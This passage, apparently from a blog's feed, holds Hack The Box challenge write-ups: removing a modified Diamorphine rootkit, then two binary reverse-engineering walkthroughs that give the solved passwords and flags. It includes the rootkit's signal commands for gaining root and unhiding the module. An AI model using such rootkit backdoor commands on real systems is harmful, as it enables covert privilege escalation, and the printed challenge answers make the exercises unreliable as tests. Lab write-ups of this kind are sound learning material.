21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!yYXW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!yYXW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png 424w, https://substackcdn.com/image/fetch/$s_!yYXW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png 848w, https://substackcdn.com/image/fetch/$s_!yYXW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png 1272w, https://substackcdn.com/image/fetch/$s_!yYXW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!yYXW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png" width="408" height="136" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:136,&quot;width&quot;:408,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:10738,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.byteberzerker.com/i/157641207?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!yYXW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png 424w, https://substackcdn.com/image/fetch/$s_!yYXW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png 848w, https://substackcdn.com/image/fetch/$s_!yYXW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png 1272w, https://substackcdn.com/image/fetch/$s_!yYXW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd0239cdb-4df2-4591-ad30-c10e3c14fc64_408x136.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Cw4B!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Cw4B!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png 424w, https://substackcdn.com/image/fetch/$s_!Cw4B!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png 848w, https://substackcdn.com/image/fetch/$s_!Cw4B!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png 1272w, https://substackcdn.com/image/fetch/$s_!Cw4B!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Cw4B!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png" width="627" height="423" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:423,&quot;width&quot;:627,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Cw4B!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png 424w, https://substackcdn.com/image/fetch/$s_!Cw4B!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png 848w, https://substackcdn.com/image/fetch/$s_!Cw4B!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png 1272w, https://substackcdn.com/image/fetch/$s_!Cw4B!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffead6549-db59-4c3e-b78c-abbcae6074a3_627x423.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Step 6: Removing the Rootkit</strong></p><ol><li><p><strong>Gain root access: <br>kill -64 0<br>whoami # Should return "root"</strong></p></li><li><p><strong>Make the rootkit visible: <br>kill -46 0</strong></p></li><li><p><strong>Remove the rootkit: <br>rmmod diamorphine</strong></p></li><li><p><strong>Confirm its removal: <br>lsmod | grep diamorphine # Should return nothing</strong></p></li></ol><p><strong>Step 7: Finding the Hidden Data</strong></p><p>Since this is a <strong>Hack The Box (HTB) challenge</strong>, the flag is likely stored in a .txt file.</p><ol><li><p><strong>Search the system for .txt files: <br>find / -type f -name "*.txt" 2&gt;/dev/null</strong></p></li><li><p><strong>Retrieve the flag: <br>cat /path/to/flag.txt</strong></p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7hJL!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7hJL!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png 424w, https://substackcdn.com/image/fetch/$s_!7hJL!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png 848w, https://substackcdn.com/image/fetch/$s_!7hJL!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png 1272w, https://substackcdn.com/image/fetch/$s_!7hJL!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7hJL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png" width="460" height="130" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:130,&quot;width&quot;:460,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7hJL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png 424w, https://substackcdn.com/image/fetch/$s_!7hJL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png 848w, https://substackcdn.com/image/fetch/$s_!7hJL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png 1272w, https://substackcdn.com/image/fetch/$s_!7hJL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e495e10-aed0-46e7-8a55-1cc8fb163ae2_460x130.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Conclusion</strong></p><p>By reverse-engineering the modified Diamorphine rootkit, we:</p><ul><li><p>Discovered the attacker <strong>modified the kill switch</strong> to kill -64 (original was kill -63).</p></li><li><p>Identified the <strong>new visibility toggle</strong> as kill -46 (original was kill -63).</p></li><li><p>Successfully <strong>removed the rootkit</strong> after making it visible.</p></li><li><p><strong>Recovered the hidden flag</strong> from a .txt file.</p></li></ul><p>This challenge demonstrated the importance of <strong>understanding malware modifications</strong> and how attackers may tweak known exploits to evade detection.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Behind The Scenes]]></title><description><![CDATA[Challenge]]></description><link>https://www.byteberzerker.com/p/hackthebox-behind-the-scenes</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-behind-the-scenes</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Thu, 20 Feb 2025 22:31:05 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!SaKV!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5be7fb19-3857-4c95-818e-5eb12cdc00b3_600x600.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>HTB Challenge: Behind the Scenes</strong></p><p><strong>Challenge Description</strong></p><p>After struggling to secure our secret strings, we finally came up with a way to make decompilation harder. Our goal was to make it impossible to figure out how the program works!</p><p><strong>Steps to Analyze the Binary</strong></p><ol><li><p>Extract the provided zip folder.</p></li><li><p>Load the binary into <strong>Detect-It-Easy</strong>.</p></li><li><p>Identify the binary as an <strong>ELF 64-bit</strong> executable compiled with <strong>GCC (9.3.0)</strong>.</p></li><li><p>Confirm that the code is written in <strong>C/C++</strong>.</p></li><li><p>Load the binary into <strong>Binary Ninja</strong> for analysis.</p></li></ol><p>While the solution is relatively easy to find, we will break down the technical aspects to better understand the challenge.</p><p><strong>Breaking Down the Challenge</strong></p><p>This challenge involved <strong>reverse engineering, signal handling, and anti-debugging techniques</strong>. Let&#8217;s go step by step to analyze the solution.</p><p><strong>Step 1: Understanding the Binary</strong></p><p>Since we only have the compiled binary (behindthescenes), we used <strong>Binary Ninja</strong> to reverse engineer it.</p><p><strong>Key Findings:</strong></p><ul><li><p>A function named <strong>segill_sigaction</strong>, acting as a signal handler.</p></li><li><p>A string in <strong>.rodata</strong> that hinted at a password check: <br>./challenge &lt;password&gt;</p></li><li><p>A <strong>UD2</strong> instruction in .rodata, which is an <strong>illegal instruction</strong> that triggers a SIGILL (Illegal Instruction Exception).</p></li></ul><p><strong>Step 2: Identifying Key Functions</strong></p><p>By analyzing the binary, we identified two important functions:</p><p><strong>1. SIGILL Handler (segill_sigaction)</strong></p><ul><li><p>Registered to handle <strong>SIGILL</strong> (Illegal Instruction signals).</p></li><li><p><strong>Modifies the execution context</strong>, potentially bypassing crashes.</p></li></ul><p><strong>2. Main Function (main)</strong></p><ul><li><p>Registers <strong>segill_sigaction</strong> as the SIGILL handler.</p></li><li><p>Triggers a <strong>SIGABRT</strong> (trap 6), which would usually crash the program.</p></li></ul><p><strong>Step 3: Finding the Password Check</strong></p><p>Within .rodata, we discovered a string that looked like a password:</p><p>Itz_0nLy_UD2</p><p>Additionally, we found:</p><p>HTB{%s}</p><p>This suggests that once the correct password is entered, the program will print a flag.</p><p><strong>Step 4: Understanding the Role of UD2</strong></p><ul><li><p><strong>UD2</strong> is an <strong>x86 instruction</strong> that <strong>forces a crash</strong> by triggering SIGILL.</p></li><li><p>Normally, an <strong>illegal instruction</strong> would terminate execution, but since a <strong>custom SIGILL handler</strong> exists, we suspected:</p><ul><li><p>The program <strong>intentionally executes UD2</strong>.</p></li><li><p>The handler <strong>modifies execution</strong> to prevent a crash.</p></li><li><p>This serves as an <strong>anti-debugging technique</strong> or a way to <strong>manipulate execution flow</strong>.</p></li></ul></li></ul><p><strong>Step 5: Running the Program with the Password</strong></p><p>With an understanding of the execution flow, we tested the suspected password:</p><p>./behindthescenes Itz_0nLy_UD2</p><p><strong>It worked!</strong> The program printed the <strong>HTB flag</strong>, confirming that our password was correct.</p><p><strong>Key Takeaways</strong></p><p><strong>Concept</strong></p><p><strong>Explanation</strong></p><p>.rodata Section</p><p>Stores <strong>strings</strong> used in the program, including the <strong>password</strong>.</p><p><strong>Signal Handling</strong></p><p>The program uses sigaction(4, &amp;handler, NULL) to catch SIGILL.</p><p><strong>UD2 Instruction</strong></p><p>Triggers a <strong>SIGILL exception</strong>, which the handler catches.</p><p><strong>Execution Hijacking</strong></p><p>The signal handler <strong>modifies program execution</strong> to prevent crashing.</p><p><strong>Reverse Engineering</strong></p><p>Instead of <strong>brute-forcing</strong>, we extracted the password from .rodata.</p><p><strong>Final Thoughts</strong></p><ul><li><p>The program hides the password behind an <strong>anti-debugging trick</strong> (SIGILL).</p></li><li><p>Understanding <strong>signal handling</strong> helped us recognize the role of UD2.</p></li><li><p>Instead of <strong>guessing</strong>, we extracted the password from .rodata.</p></li></ul><p>This challenge was a great mix of <strong>reverse engineering, anti-debugging, and execution manipulation</strong>.</p><p><strong>Technical Analysis: Key Insights from the Disassembled Binary</strong></p><p>This section provides a breakdown of the most relevant parts of the <strong>objdump -d</strong> output, focusing on the <strong>execution flow, anti-debugging techniques, password validation, and signal handling mechanisms</strong>.</p><p><strong>1. SIGILL Handler (segill_sigaction)</strong></p><p>The segill_sigaction function is responsible for handling SIGILL (Illegal Instruction) signals. Normally, an <strong>illegal instruction like UD2</strong> would cause the program to crash, but here, a custom handler <strong>modifies execution</strong> instead.</p><p>0000000000001229 &lt;segill_sigaction&gt;:<br> 1229: f3 0f 1e fa endbr64<br> 122d: 55 push %rbp<br> 122e: 48 89 e5 mov %rsp,%rbp<br> 1231: 89 7d ec mov %edi,-0x14(%rbp)<br> 1234: 48 89 75 e0 mov %rsi,-0x20(%rbp)<br> 1238: 48 89 55 d8 mov %rdx,-0x28(%rbp)<br> 124c: 48 8b 80 a8 00 00 00 mov 0xa8(%rax),%rax<br> 124f: 48 8d 50 02 lea 0x2(%rax),%rdx<br> 1257: 48 89 90 a8 00 00 00 mov %rdx,0xa8(%rax)<br> 1260: c3 ret</p><p><strong>What This Does:</strong></p><ul><li><p>Registers segill_sigaction as the SIGILL handler.</p></li><li><p>Retrieves the <strong>execution context</strong> and modifies it to <strong>bypass crashes</strong>.</p></li><li><p>Likely an <strong>anti-debugging mechanism</strong>, forcing an illegal instruction (UD2) and catching it to alter execution.</p></li></ul><p><strong>2. Registering the SIGILL Handler in main</strong></p><p>The main function registers segill_sigaction to handle SIGILL signals.</p><p>00000000000012a5 &lt;main&gt;:<br> 12a5: 48 8d 85 60 ff ff ff lea -0xa0(%rbp),%rax<br> 12ac: 48 83 c0 08 add $0x8,%rax<br> 12b3: e8 78 fe ff ff call 1130 &lt;sigemptyset@plt&gt;<br> 12b8: 48 8d 05 6a ff ff ff lea -0x96(%rip),%rax # 1229 &lt;segill_sigaction&gt;<br> 12bf: 48 89 85 60 ff ff ff mov %rax,-0xa0(%rbp)<br> 12c6: c7 45 e8 04 00 00 00 movl $0x4,-0x18(%rbp) # Signal 4 (SIGILL)<br> 12e1: e8 fa fd ff ff call 10e0 &lt;sigaction@plt&gt;</p><p><strong>What This Does:</strong></p><ul><li><p>Calls sigaction(4, &amp;handler, NULL), registering <strong>segill_sigaction</strong> for SIGILL signals.</p></li><li><p>Ensures that when UD2 (Illegal Instruction) is executed, the program does <strong>not crash</strong> but instead modifies execution flow.</p></li></ul><p><strong>3. Anti-Debugging via UD2</strong></p><p>The UD2 instruction is an illegal x86 instruction that <strong>forces a SIGILL exception</strong>, commonly used as an <strong>anti-debugging measure</strong>.</p><p>12e6: 0f 0b ud2<br> 12f1: 0f 0b ud2<br> 130b: 0f 0b ud2</p><p><strong>What This Does:</strong></p><ul><li><p>UD2 is executed <strong>multiple times</strong> throughout the code.</p></li><li><p>Normally, this would <strong>terminate</strong> the program.</p></li><li><p>Since segill_sigaction is registered as the SIGILL handler, execution <strong>continues instead of crashing</strong>.</p></li></ul><p><strong>4. Password Validation Mechanism</strong></p><p>The program checks if the input matches "Itz_0nLy_UD2". This is done in multiple steps.</p><p><strong>Checking Argument Count</strong></p><p>12e8: 83 bd 5c ff ff ff 02 cmpl $0x2,-0xa4(%rbp) # argc == 2?<br> 12ef: 74 1a je 130b &lt;main+0xaa&gt; # Jump if valid</p><ul><li><p>Ensures the user provides <strong>exactly one argument</strong>.</p></li></ul><p><strong>Checking Length of Argument</strong></p><p>131e: e8 cd fd ff ff call 10f0 &lt;strlen@plt&gt;<br> 1323: 48 83 f8 0c cmp $0xc,%rax # Password length must be 12<br> 1327: 0f 85 05 01 00 00 jne 1432 &lt;main+0x1d1&gt;</p><ul><li><p>Ensures the <strong>password length</strong> is exactly <strong>12 characters</strong>.</p></li></ul><p><strong>Comparing the Password String</strong></p><p>The program checks if the input argument matches "Itz_0nLy_UD2", piece by piece.</p><p>1342: 48 8d 35 d2 0c 00 00 lea 0xcd2(%rip),%rsi # Load "Itz"<br> 134c: e8 6f fd ff ff call 10c0 &lt;strncmp@plt&gt; # strncmp(argv[1], "Itz", 3)<br> 1372: 48 8d 35 a6 0c 00 00 lea 0xca6(%rip),%rsi # Load "_0n"<br> 13a2: 48 8d 35 7a 0c 00 00 lea 0xc7a(%rip),%rsi # Load "Ly_"<br> 13ce: 48 8d 35 52 0c 00 00 lea 0xc52(%rip),%rsi # Load "UD2"</p><ul><li><p>Compares each <strong>three-character</strong> segment separately.</p></li></ul><p><strong>5. Printing the Flag</strong></p><p>If the password is correct, the program prints the flag in the format:</p><p>HTB{Itz_0nLy_UD2}</p><p>13f4: 48 8d 3d 30 0c 00 00 lea 0xc30(%rip),%rdi # Load format string "&gt; HTB{%s}\n"<br> 1400: e8 0b fd ff ff call 1110 &lt;printf@plt&gt; # Print the flag</p><p><strong>What This Does:</strong></p><ul><li><p>Loads the flag format string "&gt; HTB{%s}\n" into %rdi.</p></li><li><p>Calls printf, substituting the user&#8217;s password into the flag format.</p></li></ul><p><strong>Conclusion &amp; Key Takeaways</strong></p><p><strong>Concept</strong></p><p><strong>Explanation</strong></p><p><strong>Anti-Debugging (UD2)</strong></p><p>The UD2 instruction <strong>triggers SIGILL</strong>, but a custom handler <strong>prevents the crash</strong>.</p><p><strong>Signal Handling</strong></p><p>sigaction(4, &amp;handler, NULL) catches SIGILL, allowing the program to <strong>continue execution</strong>.</p><p><strong>Password Extraction</strong></p><p>Instead of brute-forcing, the password "Itz_0nLy_UD2" was <strong>extracted from .rodata</strong>.</p><p><strong>Reverse Engineering</strong></p><p>By analyzing <strong>objdump</strong>, we reconstructed how the binary works without executing it.</p><p><strong>Final Thoughts</strong></p><ul><li><p>The program <strong>disguises</strong> a simple password check <strong>behind an anti-debugging trick</strong>.</p></li><li><p>By <strong>modifying execution</strong> via SIGILL handling, the program prevents <strong>straightforward analysis</strong>.</p></li><li><p>However, analyzing .rodata and objdump allowed us to <strong>recover the password</strong> without brute force.</p></li></ul><p>This was a <strong>great example</strong> of how <strong>signal handling, execution hijacking, and anti-debugging tricks</strong> can be used in real-world <strong>reverse engineering challenges</strong>! </p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Hunting License]]></title><description><![CDATA[Challenge]]></description><link>https://www.byteberzerker.com/p/hackthebox-hunting-license</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-hunting-license</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Wed, 19 Feb 2025 22:31:00 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!SaKV!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5be7fb19-3857-4c95-818e-5eb12cdc00b3_600x600.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Introduction</strong></p><p>This write-up details the process of reverse engineering a binary to extract the required passwords for a challenge. Using Binary Ninja, Ghidra, and Python, we analyzed the exam() function and the xor() function to uncover the three required passwords.</p><p><strong>Examining the exam() Function</strong></p><p>The exam() function follows a sequence of password validation steps:</p><ol><li><p><strong>First Password Check:</strong></p><ul><li><p><strong>The program reads input and compares it to a hardcoded string: <br>if (strcmp(rax, "PasswordNumeroUno") != 0)</strong></p></li><li><p><strong>If the input does not match PasswordNumeroUno, the program exits.</strong></p></li></ul></li><li><p><strong>Second Password Check:</strong></p><ul><li><p><strong>The binary stores a reversed version of the second password in memory: <br>reverse(&amp;var_1c, "0wTdr0wss4P", 0xb);</strong></p></li><li><p><strong>Reversing this string gives "P4sswordTw0".</strong></p></li><li><p><strong>If the input does not match this, the program exits.</strong></p></li></ul></li><li><p><strong>Third Password Check:</strong></p><ul><li><p><strong>This step involves an XOR operation: <br>__builtin_memset(&amp;s, c: 0, n: 0x11);<br>xor(&amp;s, &amp;t2, 0x11, 0x13);</strong></p></li><li><p><strong>The xor() function transforms t2 (a 12-byte string) into a 17-byte value using the XOR key 0x13.</strong></p></li><li><p><strong>The transformed value is compared against user input.</strong></p></li><li><p><strong>If the input does not match, the program exits.</strong></p></li></ul></li></ol><p><strong>Understanding XOR and Memory Impact</strong></p><p><strong>How XOR Works</strong></p><p>XOR (exclusive OR) is a bitwise operation that follows these rules:</p><ul><li><p>0 &#8853; 0 = 0</p></li><li><p>1 &#8853; 0 = 1</p></li><li><p>0 &#8853; 1 = 1</p></li><li><p>1 &#8853; 1 = 0</p></li></ul><p>This means XORing the same value twice will return the original value:</p><p>original = ord('A') # ASCII 65<br>key = 0x13<br>encoded = original ^ key # Encrypt<br>decoded = encoded ^ key # Decrypt<br>print(chr(decoded)) # Output: 'A'</p><p>In our binary, each byte is XORed with 0x13, which scrambles and later reconstructs the password.</p><p><strong>Memory Impact</strong></p><p>The binary initializes s with 17 bytes set to zero before XORing with t2:</p><p>__builtin_memset(&amp;s, c: 0, n: 0x11);</p><p>Since t2 only has 12 bytes, the remaining bytes are pulled from memory beyond t2, potentially containing leftover data.</p><p><strong>Reverse Engineering the xor() Function</strong></p><p>The xor() function is structured as follows:</p><p>while (result_1 &lt; arg3) {<br> *(arg1 + result_1) = *(arg2 + result_1) ^ arg4;<br> result_1 += 1;<br>}</p><ul><li><p>It loops for <strong>17 bytes</strong>, XORing each byte from t2 with 0x13.</p></li><li><p>Since t2 is <strong>12 bytes long</strong>, the remaining 5 bytes are read from adjacent memory.</p></li><li><p>We dumped this memory section and found the extra bytes: \x7f222\x13.</p></li></ul><p><strong>Extracting t2 and Decoding the Final Password</strong></p><p>From Binary Ninja, we extracted t2:</p><p>G{zawR}wUz}r</p><p>and the additional 5 bytes:</p><p>\x7f222\x13</p><p>Using Python, we decoded the password by XORing each byte with 0x13:</p><p>data = b"G{zawR}wUz}r\x7f222\x13"<br>xor_key = 0x13</p><p>decoded = bytes([b ^ xor_key for b in data])<br>print(decoded.decode())</p><p>This resulted in:</p><p>ThirdAndFinal!!!</p><p>Thus, the <strong>final password is ThirdAndFinal!!!</strong>.</p><p><strong>Conclusion</strong></p><p>By disassembling the binary, analyzing memory, and applying XOR decoding, we successfully extracted all three passwords required for the challenge:</p><ol><li><p><strong>PasswordNumeroUno</strong></p></li><li><p><strong>P4sswordTw0</strong></p></li><li><p><strong>ThirdAndFinal!!!</strong></p></li></ol><p>This process showcased key reverse engineering techniques, including static analysis, memory inspection, and binary manipulation.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Trent]]></title><description><![CDATA[Sherlock]]></description><link>https://www.byteberzerker.com/p/hackthebox-trent</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-trent</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Fri, 14 Feb 2025 22:30:13 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!KSnX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f14f041-9fb9-467f-a195-9dc6adf20801_773x519.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>HackTheBox 